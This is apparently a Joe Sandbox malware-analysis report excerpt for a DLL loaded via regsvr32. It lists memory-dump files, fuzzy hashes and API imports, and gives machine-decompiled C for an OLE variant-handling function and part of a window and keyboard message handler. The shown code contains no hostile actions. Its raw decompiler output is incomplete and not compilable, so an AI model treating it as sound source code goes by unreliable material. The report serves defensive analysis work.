Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Object$BaseDialogSelectTextUnits$CapsCreateDeleteDeviceExtentFontIndirectMetricsPoint32Release__mbsnbcpy_s_l_memset_wctomb_s
String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
API String ID: 332251102-222967699
Opcode ID: 384aeabfd8e3c82378f84a014e930b819d84851ea08dbeaf13ef1bf8bab1445e
Instruction ID: b41e73f3cd40d0cf8ebef9bcd289606718180d74c28e02b965907366521e4e5e
Opcode Fuzzy Hash: 384aeabfd8e3c82378f84a014e930b819d84851ea08dbeaf13ef1bf8bab1445e
Instruction Fuzzy Hash: 334127B1D00218AFEF10DFE4CD89ADEBBB9FF09700F104056F606A62A1DB75AA11CB54

Uniqueness

Uniqueness Score: -1.00%

Function 1003B427 Relevance: 28.9, APIs: 19, Instructions: 423
stringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E1003B427(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t190;
				intOrPtr* _t200;
				signed int _t203;
				signed int _t206;
				intOrPtr* _t208;
				intOrPtr _t211;
				char _t230;
				CHAR* _t236;
				intOrPtr _t237;
				signed short _t240;
				signed int _t241;
				signed int _t242;
				signed int _t250;
				signed int* _t257;
				signed int _t258;
				signed int _t277;
				signed short* _t278;
				signed short* _t279;
				signed int _t290;
				intOrPtr* _t293;
				CHAR* _t295;
				intOrPtr* _t296;
				intOrPtr _t297;
				signed int** _t299;
				void* _t300;
				void* _t301;
				void* _t302;
				void* _t313;

				_push(0x7c);
				_t190 = E1004764D(0x100910c1, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t300 - 0x24)) = __ecx;
				_t257 = 0;
				if( *((intOrPtr*)(__ecx)) == 0) {
					L78:
					return E10047725(_t190);
				}
				 *((intOrPtr*)(_t300 - 0x54)) = 0;
				 *((intOrPtr*)(_t300 - 0x50)) = 0;
				 *(_t300 - 0x4c) = 0;
				 *((intOrPtr*)(_t300 - 0x48)) = 0;
				 *(_t300 - 4) = 0;
				E10049170(__edi, _t300 - 0x54, 0, 0x10);
				_t302 = _t301 + 0xc;
				if( *(_t300 + 0x18) != 0) {
					 *(_t300 - 0x4c) = lstrlenA( *(_t300 + 0x18));
				}
				 *((intOrPtr*)(_t300 - 0x20)) = 0xfffffffd;
				if(( *(_t300 + 0xc) & 0x0000000c) != 0) {
					 *((intOrPtr*)(_t300 - 0x48)) = 1;
					 *((intOrPtr*)(_t300 - 0x50)) = _t300 - 0x20;
				}
				 *((intOrPtr*)(_t300 - 0x68)) = 0x1009ee28;
				 *((intOrPtr*)(_t300 - 0x64)) = _t257;
				 *((intOrPtr*)(_t300 - 0x58)) = _t257;
				 *((intOrPtr*)(_t300 - 0x5c)) = _t257;
				 *((intOrPtr*)(_t300 - 0x60)) = _t257;
				_t194 =  *(_t300 - 0x4c);
				_t308 =  *(_t300 - 0x4c) - _t257;
				 *(_t300 - 4) = 1;
				_t293 = 4;
				if( *(_t300 - 0x4c) == _t257) {
					L37:
					_t295 = 0;
					E100235FF(_t300 - 0x44);
					if( *(_t300 + 0x10) != _t257) {
						_t295 = _t300 - 0x44;
					}
					E10049170(_t293, _t300 - 0x88, _t257, 0x20);
					_t200 =  *((intOrPtr*)( *((intOrPtr*)(_t300 - 0x24))));
					 *(_t300 - 0x28) =  *(_t300 - 0x28) | 0xffffffff;
					 *(_t300 + 0xc) =  *((intOrPtr*)( *_t200 + 0x18))(_t200,  *((intOrPtr*)(_t300 + 8)), 0x100a47bc, _t257,  *(_t300 + 0xc), _t300 - 0x54, _t295, _t300 - 0x88, _t300 - 0x28);
					E1003B344(_t300 - 0x68);
					_t203 =  *(_t300 - 0x4c);
					if(_t203 == _t257) {
						L46:
						_push( *((intOrPtr*)(_t300 - 0x54)));
						E10009F3F(_t257, _t293, _t295, _t319);
						 *((intOrPtr*)(_t300 - 0x54)) = _t257;
						if( *(_t300 + 0xc) >= _t257) {
							L61:
							_t295 =  *(_t300 + 0x10);
							if(_t295 == _t257) {
								L76:
								 *(_t300 - 4) = 0;
								_t190 = E10039D98(_t300 - 0x68);
								 *(_t300 - 4) =  *(_t300 - 4) | 0xffffffff;
								__eflags =  *((intOrPtr*)(_t300 - 0x54)) - _t257;
								if(__eflags != 0) {
									_push( *((intOrPtr*)(_t300 - 0x54)));
									_t190 = E10009F3F(_t257, _t293, _t295, __eflags);
								}
								goto L78;
							}
							if(_t295 == 0xc) {
								L65:
								_t206 = (_t295 & 0x0000ffff) + 0xfffffffe;
								__eflags = _t206 - 0x13;
								if(_t206 > 0x13) {
									goto L76;
								}
								switch( *((intOrPtr*)(_t206 * 4 +  &M1003B9B7))) {
									case 0:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 1:
										__eax =  *(__ebp + 0x14);
										__ecx =  *(__ebp - 0x3c);
										 *( *(__ebp + 0x14)) = __ecx;
										goto L76;
									case 2:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 3:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 4:
										__ecx =  *(__ebp - 0x3c);
										__eax =  *(__ebp + 0x14);
										 *__eax =  *(__ebp - 0x3c);
										__ecx =  *(__ebp - 0x38);
										 *(__eax + 4) = __ecx;
										goto L76;
									case 5:
										__eax = L10020F02(__eax, __ecx,  *(__ebp + 0x14),  *(__ebp - 0x3c));
										_push( *(__ebp - 0x3c));
										__imp__#6();
										goto L76;
									case 6:
										__ecx =  *(__ebp + 0x14);
										__eax = 0;
										__eflags =  *(__ebp - 0x3c) - __bx;
										__eax = 0 | __eflags != 0x00000000;
										 *__ecx = __eflags != 0;
										goto L76;
									case 7:
										__edi =  *(__ebp + 0x14);
										__esi = __ebp - 0x44;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										__ebx = 0;
										goto L76;
									case 8:
										goto L76;
									case 9:
										 *((char*)( *((intOrPtr*)(_t300 + 0x14)))) =  *((intOrPtr*)(_t300 - 0x3c));
										goto L76;
								}
							}
							_t208 = _t300 - 0x44;
							__imp__#12(_t208, _t208, _t257, _t295);
							_t293 = _t208;
							_t321 = _t293 - _t257;
							if(_t293 >= _t257) {
								goto L65;
							}
							__imp__#9(_t300 - 0x44);
							_push(_t293);
							L49:
							L1000A8F5(_t257, _t293, _t295, _t321);
							L50:
							_t322 =  *((intOrPtr*)(_t300 - 0x70)) - _t257;
							if( *((intOrPtr*)(_t300 - 0x70)) != _t257) {
								 *((intOrPtr*)(_t300 - 0x70))(_t300 - 0x88);
							}
							_t211 = E10009F14(_t322, 0x20);
							 *((intOrPtr*)(_t300 + 0x14)) = _t211;
							_t323 = _t211 - _t257;
							 *(_t300 - 4) = 4;
							if(_t211 != _t257) {
								_push( *((intOrPtr*)(_t300 - 0x88)));
								_push(_t257);
								_push(_t257);
								_t257 = L1003A708(_t257, _t211, _t293, _t295, _t323);
							}
							_push( *((intOrPtr*)(_t300 - 0x84)));
							_t293 = __imp__#7;
							 *(_t300 - 4) = 1;
							if( *_t293() != 0) {
								_t139 = _t257 + 0x18; // 0x18
								L1000AF5E(_t139,  *((intOrPtr*)(_t300 - 0x84)));
							}
							_t296 = __imp__#6;
							 *_t296( *((intOrPtr*)(_t300 - 0x84)));
							_push( *((intOrPtr*)(_t300 - 0x80)));
							if( *_t293() != 0) {
								_t143 = _t257 + 0xc; // 0xc
								L1000AF5E(_t143,  *((intOrPtr*)(_t300 - 0x80)));
							}
							 *_t296( *((intOrPtr*)(_t300 - 0x80)));
							_push( *((intOrPtr*)(_t300 - 0x7c)));
							if( *_t293() != 0) {
								_t147 = _t257 + 0x14; // 0x14
								L1000AF5E(_t147,  *((intOrPtr*)(_t300 - 0x7c)));
							}
							 *_t296( *((intOrPtr*)(_t300 - 0x7c)));
							 *((intOrPtr*)(_t257 + 0x10)) =  *((intOrPtr*)(_t300 - 0x78));
							 *((intOrPtr*)(_t257 + 0x1c)) =  *((intOrPtr*)(_t300 - 0x6c));
							 *((intOrPtr*)(_t300 + 0x14)) = _t257;
							L10048E48(_t300 + 0x14, 0x100b4864);
							goto L61;
						}
						__imp__#9(_t300 - 0x44);
						_t321 =  *(_t300 + 0xc) - 0x80020009;
						if( *(_t300 + 0xc) == 0x80020009) {
							goto L50;
						}
						_push( *(_t300 + 0xc));
						goto L49;
					} else {
						_t295 =  *(_t300 + 0x18);
						_t293 = (_t203 << 4) +  *((intOrPtr*)(_t300 - 0x54)) - 0x10;
						while(1) {
							_t319 =  *_t295;
							if( *_t295 == 0) {
								goto L46;
							}
							_t230 =  *_t295;
							__eflags = _t230 - 8;
							if(_t230 == 8) {
								L43:
								__imp__#9(_t293);
								L44:
								_t293 = _t293 - 0x10;
								_t295 =  &(_t295[1]);
								__eflags = _t295;
								continue;
							}
							__eflags = _t230 - 0xe;
							if(_t230 != 0xe) {
								goto L44;
							}
							goto L43;
						}
						goto L46;
					}
				} else {
					_t290 = 0x10;
					_t297 = E10009F14(_t308,  ~(0 | _t308 > 0x00000000) | _t194 * _t290);
					 *((intOrPtr*)(_t300 - 0x54)) = _t297;
					E10049170(_t293, _t297, _t257,  *(_t300 - 0x4c) << 4);
					_t236 =  *(_t300 + 0x18);
					_t277 =  *(_t300 - 0x4c) << 4;
					_t302 = _t302 + 0x10;
					_t36 = _t277 - 0x10; // -16
					_t278 = _t297 + _t36;
					 *(_t300 - 0x14) = _t236;
					 *(_t300 - 0x10) = _t278;
					if( *_t236 == 0) {
						goto L37;
					}
					_t237 =  *((intOrPtr*)(_t300 + 0x1c));
					_t299 =  &(_t278[4]);
					_t258 = _t237 - 4;
					 *(_t300 - 0x1c) = _t299;
					 *((intOrPtr*)(_t300 + 0x1c)) = _t237 + 0xfffffff8;
					do {
						_t240 =  *( *(_t300 - 0x14)) & 0x000000ff;
						_t279 =  *(_t300 - 0x10);
						 *_t279 = _t240;
						if((_t240 & 0x00000040) != 0) {
							 *_t279 = _t240 & 0x0000ffbf | 0x00004000;
						}
						_t241 =  *_t279 & 0x0000ffff;
						_t313 = _t241 - 0x4002;
						if(_t313 > 0) {
							_t242 = _t241 - 0x4003;
							__eflags = _t242 - 0x12;
							if(__eflags > 0) {
								goto L35;
							}
							switch( *((intOrPtr*)(_t242 * 4 +  &M1003B96B))) {
								case 0:
									goto L34;
								case 1:
									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
									_t258 = _t258 + _t293;
									_t244 =  *_t258;
									asm("sbb ecx, ecx");
									 *_t244 =  ~( *_t244) & 0x0000ffff;
									 *_t299 = _t244;
									_t245 = E10039728(_t300 - 0x34, _t244, _t244, 0);
									 *(_t300 - 4) = 3;
									E10039E62(_t258, _t300 - 0x68, _t300,  *((intOrPtr*)(_t300 - 0x60)), _t245);
									__eflags =  *(_t300 - 0x2c);
									 *(_t300 - 4) = 1;
									if(__eflags != 0) {
										_push( *((intOrPtr*)(_t300 - 0x34)));
										E10009F3F(_t258, _t293, _t299, __eflags);
									}
									goto L35;
								case 2:
									goto L35;
							}
						} else {
							if(_t313 == 0) {
								L34:
								 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
								_t258 = _t258 + _t293;
								__eflags = _t258;
								 *_t299 =  *_t258;
								goto L35;
							}
							_t250 = _t241;
							if(_t250 > 0x13) {
								goto L35;
							}
							switch( *((intOrPtr*)(_t250 * 4 +  &M1003B91B))) {
								case 0:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__ax =  *__ebx;
									goto L28;
								case 1:
									goto L34;
								case 2:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
									__eax =  *(__ebp + 0x1c);
									__ebx =  &(__ebx[2]);
									 *__esi =  *( *(__ebp + 0x1c));
									goto L35;
								case 3:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
									__eax =  *(__ebp + 0x1c);
									__ebx =  &(__ebx[2]);
									 *__esi =  *( *(__ebp + 0x1c));
									goto L35;
								case 4:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									goto L17;
								case 5:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									_push(__eax);
									 *(__ebp - 0x1c) = __eax;
									__imp__#2();
									__eflags =  *(__ebp - 0x1c);
									 *__esi = __eax;
									if(__eflags == 0) {
										goto L35;
									}
									__eflags = __eax;
									if(__eflags != 0) {
										goto L35;
									}
									goto L23;
								case 6:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									 *__ebx =  ~( *__ebx);
									asm("sbb eax, eax");
									L28:
									 *__esi = __ax;
									goto L35;
								case 7:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 4;
									__edi =  *(__ebp - 0x10);
									__ebx =  &(__ebx[1]);
									__esi =  *__ebx;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsd");
									__esi =  *(__ebp - 0x1c);
									_push(4);
									_pop(__edi);
									goto L35;
								case 8:
									L24:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									_push(__eax);
									__ecx = __ebp - 0x18;
									 *(__ebp - 0x1c) = __eax;
									__eax = E1000B9D2(__ebx, __ecx, __edi, __esi, __eflags);
									_push( *(__ebp - 0x18));
									 *((char*)(__ebp - 4)) = 2;
									__imp__#2();
									__eflags =  *(__ebp - 0x1c);
									 *__esi = __eax;
									if( *(__ebp - 0x1c) == 0) {
										L26:
										__ecx =  *(__ebp - 0x18);
										__eax =  *(__ebp - 0x10);
										__ecx =  *(__ebp - 0x18) + 0xfffffff0;
										 *( *(__ebp - 0x10)) = 8;
										 *((char*)(__ebp - 4)) = 1;
										__eax = L100013E3(__ecx, __edx);
										goto L35;
									}
									__eflags = __eax;
									if(__eflags == 0) {
										L23:
										__eax = E1000A035(__ebx, __ecx, __edi, __esi, __eflags);
										goto L24;
									}
									goto L26;
								case 9:
									goto L35;
								case 0xa:
									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
									_t258 = _t258 + _t293;
									 *_t299 =  *_t258;
									goto L35;
								case 0xb:
									__eax =  *(__ebp + 0x1c);
									__eax =  *(__ebp + 0x1c) + 8;
									 *(__ebp + 0x1c) = __eax;
									__ebx =  &(__ebx[2]);
									__eflags = __ebx;
									L17:
									__ecx =  *__eax;
									 *__esi = __ecx;
									 *(__esi + 4) = __eax;
									goto L35;
							}
						}
						L35:
						 *(_t300 - 0x10) =  *(_t300 - 0x10) - 0x10;
						_t299 = _t299 - 0x10;
						 *(_t300 - 0x14) =  &(( *(_t300 - 0x14))[1]);
						 *(_t300 - 0x1c) = _t299;
					} while ( *( *(_t300 - 0x14)) != 0);
					_t257 = 0;
					goto L37;
				}
			}

0x1003b427
0x1003b42e
0x1003b433
0x1003b436
0x1003b43a
0x1003b913
0x1003b918
0x1003b918
0x1003b440
0x1003b443
0x1003b446
0x1003b449
0x1003b453
0x1003b456
0x1003b45b
0x1003b461
0x1003b46c
0x1003b46c
0x1003b473
0x1003b47a
0x1003b47f
0x1003b486
0x1003b486
0x1003b489
0x1003b490
0x1003b493
0x1003b496
0x1003b499
0x1003b49c
0x1003b49f
0x1003b4a3
0x1003b4a7
0x1003b4a8
0x1003b6c8
0x1003b6cc
0x1003b6ce
0x1003b6d7
0x1003b6d9
0x1003b6d9
0x1003b6e6
0x1003b6ee
0x1003b6f0
0x1003b71c
0x1003b71f
0x1003b724
0x1003b729
0x1003b754
0x1003b754
0x1003b757
0x1003b760
0x1003b763
0x1003b838
0x1003b838
0x1003b83e
0x1003b8f5
0x1003b8f8
0x1003b8fc
0x1003b901
0x1003b905
0x1003b908
0x1003b90a
0x1003b90d
0x1003b912
0x00000000
0x1003b908
0x1003b848
0x1003b86d
0x1003b870
0x1003b873
0x1003b876
0x00000000
0x00000000
0x1003b878
0x00000000
0x1003b889
0x1003b890
0x00000000
0x00000000
0x1003b8ed
0x1003b8f0
0x1003b8f3
0x00000000
0x00000000
0x1003b8a8
0x1003b8ab
0x00000000
0x00000000
0x1003b8b2
0x1003b8b5
0x00000000
0x00000000
0x1003b895
0x1003b898
0x1003b89b
0x1003b89d
0x1003b8a0
0x00000000
0x00000000
0x1003b8bf
0x1003b8c4
0x1003b8c7
0x00000000
0x00000000
0x1003b8cf
0x1003b8d2
0x1003b8d4
0x1003b8d8
0x1003b8db
0x00000000
0x00000000
0x1003b8df
0x1003b8e2
0x1003b8e5
0x1003b8e6
0x1003b8e7
0x1003b8e8
0x1003b8e9
0x00000000
0x00000000
0x00000000
0x00000000
0x1003b885
0x00000000
0x00000000
0x1003b878
0x1003b84c
0x1003b851
0x1003b857
0x1003b859
0x1003b85b
0x00000000
0x00000000
0x1003b861
0x1003b867
0x1003b77f
0x1003b77f
0x1003b784
0x1003b784
0x1003b787
0x1003b790
0x1003b790
0x1003b795
0x1003b79b
0x1003b79e
0x1003b7a0
0x1003b7a4
0x1003b7a6
0x1003b7ae
0x1003b7af
0x1003b7b5
0x1003b7b5
0x1003b7b7
0x1003b7bd
0x1003b7c3
0x1003b7cb
0x1003b7d3
0x1003b7d6
0x1003b7d6
0x1003b7e1
0x1003b7e7
0x1003b7e9
0x1003b7f0
0x1003b7f5
0x1003b7f8
0x1003b7f8
0x1003b800
0x1003b802
0x1003b809
0x1003b80e
0x1003b811
0x1003b811
0x1003b819
0x1003b81e
0x1003b824
0x1003b830
0x1003b833
0x00000000
0x1003b833
0x1003b76d
0x1003b773
0x1003b77a
0x00000000
0x00000000
0x1003b77c
0x00000000
0x1003b72b
0x1003b72e
0x1003b734
0x1003b74f
0x1003b74f
0x1003b752
0x00000000
0x00000000
0x1003b73a
0x1003b73c
0x1003b73e
0x1003b744
0x1003b745
0x1003b74b
0x1003b74b
0x1003b74e
0x1003b74e
0x00000000
0x1003b74e
0x1003b740
0x1003b742
0x00000000
0x00000000
0x00000000
0x1003b742
0x00000000
0x1003b74f
0x1003b4ae
0x1003b4b2
0x1003b4c2
0x1003b4cd
0x1003b4d0
0x1003b4d8
0x1003b4db
0x1003b4de
0x1003b4e4
0x1003b4e4
0x1003b4e8
0x1003b4eb
0x1003b4ee
0x00000000
0x00000000
0x1003b4f4
0x1003b4f9
0x1003b4fc
0x1003b502
0x1003b505
0x1003b508
0x1003b50b
0x1003b511
0x1003b514
0x1003b517
0x1003b521
0x1003b521
0x1003b524
0x1003b52c
0x1003b52e
0x1003b64b
0x1003b650
0x1003b653
0x00000000
0x00000000
0x1003b655
0x00000000
0x00000000
0x00000000
0x1003b65c
0x1003b65f
0x1003b661
0x1003b667
0x1003b671
0x1003b678
0x1003b67a
0x1003b686
0x1003b68a
0x1003b68f
0x1003b693
0x1003b697
0x1003b699
0x1003b69c
0x1003b6a1
0x00000000
0x00000000
0x00000000
0x00000000
0x1003b534
0x1003b534
0x1003b6a4
0x1003b6a4
0x1003b6a7
0x1003b6a7
0x1003b6ab
0x00000000
0x1003b6ab
0x1003b53b
0x1003b53f
0x00000000
0x00000000
0x1003b545
0x00000000
0x1003b55a
0x1003b55d
0x1003b55f
0x00000000
0x00000000
0x00000000
0x00000000
0x1003b582
0x1003b586
0x1003b58b
0x1003b58e
0x00000000
0x00000000
0x1003b595
0x1003b599
0x1003b59e
0x1003b5a1
0x00000000
0x00000000
0x1003b5a8
0x1003b5ab
0x1003b5ad
0x00000000
0x00000000
0x1003b5b1
0x1003b5b4
0x1003b5b6
0x1003b5b8
0x1003b5b9
0x1003b5bc
0x1003b5c2
0x1003b5c6
0x1003b5c8
0x00000000
0x00000000
0x1003b5ce
0x1003b5d0
0x00000000
0x00000000
0x00000000
0x00000000
0x1003b623
0x1003b626
0x1003b62a
0x1003b62c
0x1003b62e
0x1003b62e
0x00000000
0x00000000
0x1003b633
0x1003b637
0x1003b63a
0x1003b63d
0x1003b63f
0x1003b640
0x1003b641
0x1003b642
0x1003b643
0x1003b646
0x1003b648
0x00000000
0x00000000
0x1003b5db
0x1003b5db
0x1003b5de
0x1003b5e0
0x1003b5e2
0x1003b5e3
0x1003b5e6
0x1003b5e9
0x1003b5ee
0x1003b5f1
0x1003b5f5
0x1003b5fb
0x1003b5ff
0x1003b601
0x1003b607
0x1003b607
0x1003b60a
0x1003b60d
0x1003b610
0x1003b615
0x1003b619
0x00000000
0x1003b619
0x1003b603
0x1003b605
0x1003b5d6
0x1003b5d6
0x00000000
0x1003b5d6
0x00000000
0x00000000
0x00000000
0x00000000
0x1003b54c
0x1003b54f
0x1003b553
0x00000000
0x00000000
0x1003b567
0x1003b56a
0x1003b56d
0x1003b570
0x1003b570
0x1003b573
0x1003b573
0x1003b575
0x1003b57a
0x00000000
0x00000000
0x1003b545
0x1003b6ad
0x1003b6ad
0x1003b6b1
0x1003b6b4
0x1003b6bd
0x1003b6bd
0x1003b6c6
0x00000000
0x1003b6c6

APIs

__EH_prolog3.LIBCMT ref: 1003B42E
_memset.LIBCMT ref: 1003B456
lstrlenA.KERNEL32(?), ref: 1003B466
_memset.LIBCMT ref: 1003B4D0
_memset.LIBCMT ref: 1003B6E6
VariantClear.OLEAUT32(?), ref: 1003B745
VariantClear.OLEAUT32(?), ref: 1003B76D
SysStringLen.OLEAUT32(?), ref: 1003B7C7
SysFreeString.OLEAUT32(?), ref: 1003B7E7
SysStringLen.OLEAUT32(?), ref: 1003B7EC
SysFreeString.OLEAUT32(?), ref: 1003B800
SysStringLen.OLEAUT32(?), ref: 1003B805
SysFreeString.OLEAUT32(?), ref: 1003B819
__CxxThrowException@8.LIBCMT ref: 1003B833
VariantChangeType.OLEAUT32(?,?,00000000,?), ref: 1003B851
VariantClear.OLEAUT32(?), ref: 1003B861

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: String$Variant$ClearFree_memset$ChangeException@8H_prolog3ThrowTypelstrlen
String ID:
API String ID: 4128688680-0
Opcode ID: 29c44fd8ba22138191f675dc56ed80d01559a1aa598323f94008261ca5ed00b7
Instruction ID: 84fc08546edbdc28cc08b8fc5503e57ba4d76b13c18cf0e412093733c6966a00
Opcode Fuzzy Hash: 29c44fd8ba22138191f675dc56ed80d01559a1aa598323f94008261ca5ed00b7
Instruction Fuzzy Hash: BDF167B4D0064ADFDF12CFA8C885AEDBBB4EF05345F104069EA51AB2A2DB349A55CF50

Uniqueness

Uniqueness Score: -1.00%

Function 10033257 Relevance: 26.0, APIs: 17, Instructions: 452
windowkeyboardCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E10033257(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4, struct tagMSG* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v24;
				int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				struct HWND__* _v52;
				signed int _t139;
				signed int _t141;
				void* _t142;
				signed int _t146;
				signed int _t149;
				intOrPtr _t150;
				signed int _t152;
				signed char _t153;
				signed int _t154;
				signed int _t155;
				int _t156;
				signed int _t161;
				signed int _t165;
				void* _t167;
				signed char _t171;
				signed int _t172;
				signed int _t173;
				signed int _t174;
				signed char _t182;
				intOrPtr _t183;
				signed int _t184;
				short _t188;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t195;
				signed int _t198;
				signed char _t199;
				signed int _t200;
				signed int _t201;
				short _t204;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				void* _t211;
				signed int _t215;
				signed int _t216;
				struct HWND__* _t217;
				struct tagMSG* _t221;
				intOrPtr _t224;
				void* _t231;
				void* _t234;
				struct tagMSG* _t240;
				signed int _t242;
				int _t243;
				signed int _t244;
				long _t247;
				intOrPtr _t249;
				signed int _t251;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				void* _t260;
				void* _t262;

				_t232 = __ecx;
				_t260 = _t262;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t139 = E100330B4(_a4, _a8);
				_t238 = _t139;
				if(_t139 == 0) {
					_t232 = _a4;
					_t231 = E100122D1(_a4);
					if(_t231 != 0) {
						_t221 =  *((intOrPtr*)(_t231 + 0x44));
						_a8 = _t221;
						if(_t221 != 0) {
							while(1) {
								_t9 = _t231 + 0x40; // 0x40
								_t232 = _t9;
								_t258 =  *(E10012115( &_a8));
								_t224 =  *((intOrPtr*)(_t258 + 4));
								if(_t224 != 0 && _t224 ==  *((intOrPtr*)(_t231 + 0x70))) {
									break;
								}
								if( *_t258 == 0 ||  *_t258 != GetFocus()) {
									if(_a8 != 0) {
										continue;
									} else {
									}
								} else {
									break;
								}
								goto L10;
							}
							_t238 = _t258;
						}
					}
				}
				L10:
				_t247 = 0;
				while(1) {
					_t238 = E10033106(_t232, _a4, _t238, _a12);
					if(_t238 == 0) {
						break;
					}
					_t142 = L10032BA1(_t238);
					_pop(_t232);
					if(_t142 == 0) {
						L14:
						if(_t238 == 0) {
							L21:
							__eflags =  *(_t238 + 4);
							if(__eflags == 0) {
								E1000A069(0, _t232, _t238, _t247, __eflags);
								asm("int3");
								_push(0x28);
								E10047680(0x1009095f, 0, _t238, _t247);
								_t146 = _a4;
								__eflags = _t146;
								if(_t146 != 0) {
									_v48 =  *((intOrPtr*)(_t146 + 0x20));
								} else {
									_v48 = _v48 & _t146;
								}
								_t240 = _a8;
								_t249 = _t240->message;
								_v32 = _t249;
								_v52 = GetFocus();
								_t149 = E10013FEA(0, _t232, _t260, _t148);
								_t229 = 0x100;
								__eflags = _t249 - 0x100;
								_v24 = _t149;
								if(_t249 < 0x100) {
									L34:
									__eflags = _t249 + 0xfffffe00 - 9;
									if(_t249 + 0xfffffe00 > 9) {
										goto L56;
									} else {
										goto L35;
									}
								} else {
									__eflags = _t249 - 0x109;
									if(_t249 <= 0x109) {
										L35:
										__eflags = _t149;
										if(_t149 == 0) {
											L56:
											_t251 = 0;
											_v28 = 0;
											_t150 = E10013FEA(_t229, _t232, _t260,  *_t240);
											_v44 = _v44 & 0;
											_v36 = _t150;
											_t152 = _v32 - _t229;
											__eflags = _t152;
											_v40 = 2;
											if(_t152 == 0) {
												_t153 = L10032AFB(_v36, _t240);
												_t232 =  *(_t240 + 8) & 0x0000ffff;
												__eflags = _t232 - 0x1b;
												if(__eflags > 0) {
													__eflags = _t232 - 0x25;
													if(_t232 < 0x25) {
														goto L75;
													} else {
														__eflags = _t232 - 0x26;
														if(_t232 <= 0x26) {
															_v44 = 1;
															goto L110;
														} else {
															__eflags = _t232 - 0x28;
															if(_t232 <= 0x28) {
																L110:
																_t171 = L10032AFB(_v24, _t240);
																__eflags = _t171 & 0x00000001;
																if((_t171 & 0x00000001) != 0) {
																	goto L75;
																} else {
																	__eflags = _v44;
																	_t232 = _a4;
																	_push(0);
																	if(_v44 == 0) {
																		_t172 = E10018415(_t229, _t232, _t240);
																	} else {
																		_t172 = E100183C7(_t229, _t232, _t240);
																	}
																	_t254 = _t172;
																	__eflags = _t254;
																	if(_t254 == 0) {
																		goto L75;
																	} else {
																		__eflags =  *(_t254 + 8);
																		if( *(_t254 + 8) != 0) {
																			_t232 = _a4;
																			E10017EC9(_a4, _t254);
																		}
																		__eflags =  *(_t254 + 4);
																		if( *(_t254 + 4) == 0) {
																			_t173 =  *_t254;
																			__eflags = _t173;
																			if(_t173 == 0) {
																				_t232 = _a4;
																				_t174 = L10032C12(_a4, _v24, _v44);
																			} else {
